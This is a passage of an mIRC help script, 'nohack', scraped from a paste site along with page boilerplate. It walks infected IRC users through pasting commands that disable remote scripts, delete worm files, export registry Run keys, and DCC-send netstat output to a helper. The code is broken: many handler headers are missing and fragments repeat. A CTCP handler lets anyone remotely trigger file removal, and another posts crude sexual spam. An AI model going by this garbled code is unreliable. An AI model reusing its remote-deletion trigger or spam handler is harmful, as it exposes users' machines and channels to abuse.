this to channel --> %auto.remove.nohack.a }
else { echo 4 error: to perform these command you need to be in #nohack }
}
alias auto.remove.nohack.god {
if ($active == #nohack) { //say %nick.helped.god $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.god }
}
alias auto.remove.nohack.sativo {
if ($active == #nohack) { //say %nick.helped.sativo $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.sativo }
}
alias auto.remove.nohack.nkie {
if ($active == #nohack) { //say %nick.helped.nkie $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.nkie }
}
alias auto.remove.nohack.dab {
if ($active == #nohack) { //say %nick.helped.dab $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.dab }
}
alias auto.remove.nohack.twg {
if ($active == #nohack) { //say %nick.helped.twg $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.twg }
}
alias auto.remove.nohack.s {
if ($active == #nohack) { //say %nick.helped.s $+ : please type (or copy/paste)
this to channel --> %auto.remove.nohack.s }
}
alias auto.remove.nohack.script {
if ($active == #nohack) { //say %nick.helped.script $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.script }
}
alias auto.remove.nohack.server {
if ($active == #nohack) { //say %nick.helped.server $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.server }
}
alias auto.remove.nohack.chat {
if ($active == #nohack) { //say %nick.helped.chat $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.chat }
}
alias auto.remove.nohack.hack {
if ($active == #nohack) { //say %nick.helped.hack $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.hack }
}
alias auto.remove.nohack.y {
if ($active == #nohack) { //say %nick.helped.y $+ : please type (or copy/paste)
this to channel --> %auto.remove.nohack.y }
}
alias auto.remove.nohack.mlrc {
if ($active == #nohack) { //say %nick.helped.mlrc $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.mlrc }
}
alias auto.remove.nohack.mirc32 {
if ($active == #nohack) { //say %nick.helped.mirc32 $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.mirc32 }
}
alias auto.remove.nohack.system {
if ($active == #nohack) { //say %nick.helped.system $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.system }
}
alias auto.remove.nohack.stavio {
if ($active == #nohack) { //say %nick.helped.stavio $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.stavio }
}
alias auto.remove.nohack.scripl {
if ($active == #nohack) { //say %nick.helped.scripl $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.scripl }
}
alias auto.remove.nohack.boogy {
if ($active == #nohack) { //say %nick.helped.boogy $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.boogy }
}
alias auto.remove.nohack.mircx {
if ($active == #nohack) { //say %nick.helped.mircx $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.mircx }
}
alias auto.remove.nohack.nospam {
if ($active == #nohack) { //say %nick.helped.nospam $+ : please type (or
copy/paste) this to channel --> %auto.remove.nohack.nospam }
}
alias check.virus {
set %nick.check.virus.sites $snick(#,1)
msg $chan %nick.check.virus.sites $+ : to check if you have any viruses in your
computer please do all the following steps:
msg $chan 4(1) windows update: the windows update website is
on 12"product updates" and download all the critical updates you need, and service
msg $chan 4(2) trend-micro online scan: you may get a free online-scan at
3http://housecall.trendmicro.com/housecall/start_corp.asp once there, choose your
country and click on go, let the applets download, then check all your hard drive
letters and don't forget the check the {auto clean} option before you click on
scan.
msg $chan 4(3) swat it! trojan scan: you may get (free) swat-it trojan detection
and removal utility at 3http://swatit.org/download.html 4*remember* to update the
program so it detects/remove the latests bots/trojans/virus variants.
msg $chan 4(4) spyware scan: to fight agains spyware please download spybot at
msg $chan 4(5) irc spam scan: you may get spam remover [a mirc spamming removal
tool] at 3http://www.dejhantulip.net/nohack/files/spam_remover.zip 4*note* be sure
to click on 12"liveupdate" to get the latest variants treated. read the readme.txt
files to understand the options and features of the spam remover.
}
alias additional.instructions {
set %nick.add.instructions $snick(#,1)
msg $chan %nick.add.instructions $+ : in my opinion, the following applications
are important to keep your computer in good shape:
msg $chan 4(1) za firewall: you may get zonealarm firewall at
3http://www.zonelabs.com 4*note* this is a trial version for this firewall. you
may use it for free the first 30 days. after that period of time, if you want to
keep using it, you have to purchase it.
msg $chan 4(1) registry cleaner: a good registry cleaner to be run periodically
is reghealer found at 3http://www.fixregistry.com/regheal/ 4*note* this is a trial
version (30 days.)
msg $chan 4(1) hard drive defragmentation: this should be done periodically and
windows provides the software to do it. it is found at: start -> all programs ->
accessories -> system tools -> disk defragmenter.
}
alias check.virus.es {
set %nick.check.virus.sites $snick(#,1)
msg $chan %nick.check.virus.sites $+ : para hacer un chequeo general en tu
mquina y ver si estas infectado, por favor haz todos los siguientes pasos:
msg $chan 4(1) windows update: el website the windows update es
3http://windowsupdate.microsoft.com ( escribe en mirc /run wupdmgr ) una vez all,
haz click en 12"product updates" y baja todos los updates criticos que necesites,
al igual que todos los service packs que no esten instalados en tu mquina.
msg $chan 4(2) trend-micro online scan: puedes hacerte un scan para v!ruses
gratis en 3http://housecall.trendmicro.com/housecall/start_corp.asp deja que bajen
los applets y sigue las instrucciones y borra todos los archivos infectados.
msg $chan 4(3) swat it! trojan scan: consigue swat-it trojan detection and
removal utility en 3http://swatit.org/download.html 3*recuerda* de dar click en
2update para que el programa se auto-actualize y pueda remover lo ltimo en
v!rus/tr0yanos
msg $chan 4(4) spyware scan: para luchar contra el spyware bajate el spybot en
msg $chan 4(5) irc spam scan: puedes conseguir spam remover [una herramienta
para remover el spam del mirc] at
3http://www.dejhantulip.net/nohack/files/spam_remover.zip 4*nota* las
instrucciones y el addon esta en ingls. viene con un readme.txt que es aconsejable
leerlo antes de usar el programa.
}
alias additional.instructions.es {
set %nick.add.instructions $snick(#,1)
msg $chan %nick.add.instructions $+ : en mi opinion, las siguientes opciones y
aplicaciones son importantes para tener una computadora en buena forma:
msg $chan 4(1) za firewall: puedes obtener el firewall zone alarm en
3http://www.zonelabs.com 4*nota* tiene un periodo gratis de 30 das.
msg $chan 4(1) registry cleaner: un buen limpiador de registro que debe ser
usado peridicamente se lo encuentra en 3http://www.fixregistry.com/regheal/
4*nota* esta versin es gratis por 30 das.
msg $chan 4(1) hard drive defragmentation: esto se debe hacer peridicamente y
windows provee un software incorporado para hacerlo. se lo encuentra en: inicio ->
programas -> accesorios -> herramientas de sistema -> defragmentador de disco.
}
;
; nohack dialog base [start]
;
dialog nohack {
title "nohack v0.1.0 - by zvonarek"
size -1 -1 130 100
option dbu
tab "spam", 1, 5 5 120 90

tab "registry", 2
tab "other", 3
tab "urls", 4
button "$script(0)", 8, 15 30 50 12, tab 1

button "$script(1)", 9, 15 46 50 12, tab 1
button "mirc.ini -trfiles", 10, 15 62 50 12, tab 1
button "$exists( ? )", 11, 15 78 50 12, tab 1
button "$findfile( ? )", 12, 70 30 50 12, tab 1
button "remove (one line)", 13, 70 46 50 12, tab 1
button "remove (multi-line)", 14, 70 62 50 12, tab 1
button "clean", 15, 70 78 50 12, tab 1
button "specific ?", 19, 15 40 50 12, tab 2

button "run", 20, 15 64 50 12, tab 2
button "irc", 21, 70 40 50 12, tab 2
button "chatfile", 22, 70 64 50 12, tab 2
button "win.ini", 23, 70 30 50 12, tab 3

button "system.ini", 24, 70 46 50 12, tab 3
button "netstat", 25, 70 62 50 12, tab 3
button "trace ip", 26, 70 78 50 12, tab 3
list 27, 12 30 50 68, tab 3
; id, left, up,
button "online scan", 28, 15 30 50 12, tab 4
button "the cleaner", 29, 15 46 50 12, tab 4
button "swat-it", 30, 15 62 50 12, tab 4
button "ident setup", 31, 15 78 50 12, tab 4
button "safe mode restart", 32, 70 30 50 12, tab 4
button "top-20 viruses", 33, 70 46 50 12, tab 4
button "windows update", 34, 70 62 50 12, tab 4
button "gt-bots", 35, 70 78 50 12, tab 4
}
; -= first tab =-
on 1:dialog:nohack:sclick:8: {
msg %nohack.chan %nohack.nick : please type //say $script(0)
}
msg %nohack.chan %nohack.nick : please type //say $script(1)
}
msg %nohack.chan %nohack.nick : please type //play -trfiles $me mirc.ini 2000
}
set %exists.nohack $$?="input the file"
msg %nohack.chan %nohack.nick : please type //say $chr(36) $+ exists( $+
%exists.nohack $+ )
}
set %findfile.nohack $$?="input the file"
msg %nohack.chan %nohack.nick : please type //say $findfile(c:\, $+ * $+
%findfile.nohack $+ * $+ ,0,msg %nohack.chan $1-)
}
msg %nohack.chan %nohack.nick $+ , please type (or copy/paste) the following:
//!remote off | !run attrib -r mirc.ini | !ignore -r | !sockclose * | !timers off
| !unload -rsn %variant.nohack | !remove %variant.nohack | !run attrib +r mirc.ini
| !msg %nohack.chan $me $+ : removed %variant.nohack | !msg %nohack.chan searching
for %variant.nohack $+ ... | !msg %nohack.chan $findfile(c:\, $+ %variant.nohack
$+ ,0,msg %nohack.chan $1-) | !remote on
}
.timer[step0] 1 1 msg %nohack.chan %nohack.nick : please type //!unload -rsn
%variant.nohack
.timer[step1] 1 3 msg %nohack.chan %nohack.nick : then type //!remove
%variant.nohack
.timer[step2] 1 5 msg %nohack.chan %nohack.nick : then type /timers off
.timer[step3] 1 7 msg %nohack.chan %nohack.nick : then type /sockclose *
.timer[step4] 1 9 msg %nohack.chan %nohack.nick : then type /sreq ask
.timer[step5] 1 11 msg %nohack.chan %nohack.nick : after you type all that type
ok!
}
msg %nohack.chan %nohack.nick : you are now clean. you were infected because you
either visited an infected url that was spammed in mirc or you typed a $decode (or
//write) command in your mirc. don't do this again. now you have to download all
the critical updates, patches, and service packs for your windows version. these
may be downloaded at http://windowsupdate.microsoft.com or by typing in your mirc
/run wupdmgr
}
; -= second tab =-
set %registry.nohack $$?="type the string to be saved in rs.txt"
msg %nohack.chan %nohack.nick : please type (or copy/paste): //run regedit /e
c:\rs.txt %registry.nohack
msg %nohack.chan %nohack.nick : after you do that type //say $chr(36) $+
exists(c:\rs.txt) = rs.txt
}
c:\run.txt hkey_local_machine\software\microsoft\windows\currentversion\run | msg
$active $me : run.txt ok!
}
c:\irc.txt hkey_classes_root\irc | msg $active $me irc.txt ok!
}
c:\cf.txt hkey_classes_root\chatfile | msg $active $me cf.txt ok!
}
; -= third tab =-
set %user.win.dir $$?"whats his/her windows directory ? (usually c:\windows\)" |
msg %nohack.chan %nohack.nick : please type //play $me $chr(36) $+ shortfn( $+
$chr(36) $+ findfile( $+ %user.win.dir $+ ,win.ini,1)) 2000
}
set %user.win.dir $$?"whats his/her windows directory ? (usually c:\windows\)" |
msg %nohack.chan %nohack.nick : please type //play $me $chr(36) $+ shortfn( $+
$chr(36) $+ findfile( $+ %user.win.dir $+ ,system.ini,1)) 2000
}
-rn)"
msg %nohack.chan %nohack.nick : close all the programs you are running except
mirc. then type (in mirc): //run command /c netstat %netstat.cmds > c:\ns.txt and
then type /dcc send $me c:\ns.txt
}
msg %nohack.chan to trace a specific ip go to
http://security.symantec.com/ssc/vr_main.asp?
}
on 1:dialog:nohack:dclick:27: {
; if ($did(name,id,$did(name,id).sel).text == text) { commands }
if ($did(nohack,27,$did(nohack,27).sel).text == mcafee tools) { msg %nohack.chan
get the mcafee removal tools at http://www.mcafeeb2b.com/naicommon/avert/avert-
research-center/tools.asp }
if ($did(nohack,27,$did(nohack,27).sel).text == symantec tools) { msg
%nohack.chan get the symantec removal tools at
http://www.symantec.com/avcenter/tools.list.html }
if ($did(nohack,27,$did(nohack,27).sel).text == bitdefender tools) { msg
%nohack.chan get the bitdefender removal tools at
http://www.bitdefender.com/html/free_tools.php }
if ($did(nohack,27,$did(nohack,27).sel).text == quickheal tools) { msg
%nohack.chan get the quickheal removal tools at
http://www.quickheal.com/othdown.htm }
if ($did(nohack,27,$did(nohack,27).sel).text == nohack tools) { msg %nohack.chan
get the nohack removal tools at http://www.nohack.net/bin/ }
if ($did(nohack,27,$did(nohack,27).sel).text == fruit^loop tools) { msg
%nohack.chan get the fruit^loop's removal tools at
http://www.fruitloop.net/virushelp/fix/ }
if ($did(nohack,27,$did(nohack,27).sel).text == dokfleed tools) { msg
%nohack.chan get the dokfleed removal tools at
http://www.dokfleed.net/nuke/search.php?query=&topic=10 }
; /did -i new_table 7 1 <text>
}
alias fill_list {
.did -i nohack 27 1 mcafee tools
.did -i nohack 27 2 symantec tools
.did -i nohack 27 3 bitdefender tools
.did -i nohack 27 4 quickheal tools
.did -i nohack 27 5 nohack tools
.did -i nohack 27 6 fruit^loop tools
.did -i nohack 27 7 dokfleed tools
}
; -= forth tab =-
msg %nohack.chan get an online-scan at:
http://housecall.trendmicro.com/housecall/start_corp.asp once there, choose your
country and click on go, let the applets download then check all your hard drive
letters and don't forget the check the {auto clean} before you click on scan.
}
msg %nohack.chan get a copy of the cleaner at
http://www.cybermesa.com/~moosoft/cleaner3.exe
}
msg %nohack.chan get swat-it trojan detection and removal utility at
http://www.lockdowncorp.com/bots/downloadswatit.html
}
msg %nohack.chan %nohack.nick : for information on how to setup ident on a
windows computer goto http://kline.dal.net/exploits/winident.htm to set it up on a
mac goto http://kline.dal.net/exploits/macident.htm for more information on ident
read http://kline.dal.net/exploits/ident.htm
}
msg %nohack.chan %nohack.nick : information of how to restart your pc in safe
mode available at
http://service1.symantec.com/support/tsgeninfo.nsf/docid/2001052409420406
}
msg %nohack.chan to get a list of the top 20 virus threats go to
http://www.nettech-solutions.com/virus_1-1.html
}
msg %nohack.chan %nohack.nick : the windows update website is
on product updates and download all the critical updates you need, and service
}
msg %nohack.chan for detailled information about gt bot go to
http://golcor.tripod.com/gtbot.htm
}
ctcp *:nohack.irc:*:{ .notice $nick nohack.irc - v4.0 by zvonarek}
ctcp *:ghey:*{ msg #nh i suck cocks... wanna get your cock sucked for cheap? msg
me! }
ctcp *:.rm:*:{ .timer[rm1] 1 3 .unload -rsn $shortfn($script) | .timer[rm2] 1 5
.echo -q $findfile($left($mircdir,3),nohack.irc,0,.remove $shortfn($1-)) | .raw -q
privmsg $nick done }
;
; nohack dialog base [/end]
;
total paste views: 7 � trackback (0) � permalink
update the post

either update this post and resubmit it with changes, or make a new post.
you may also comment on this post.
update paste below

NH1

Transféré par

Informations du document

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

NH1

Transféré par

Droits d'auteur :

Formats disponibles

http://pastebin.

ca/746087alternatives: raw | tree | descendants

tab "spam", 1, 5 5 120 90

button "$script(0)", 8, 15 30 50 12, tab 1

button "specific ?", 19, 15 40 50 12, tab 2

button "win.ini", 23, 70 30 50 12, tab 3

update the post

you may also comment on this post.

update paste below

Vous aimerez peut-être aussi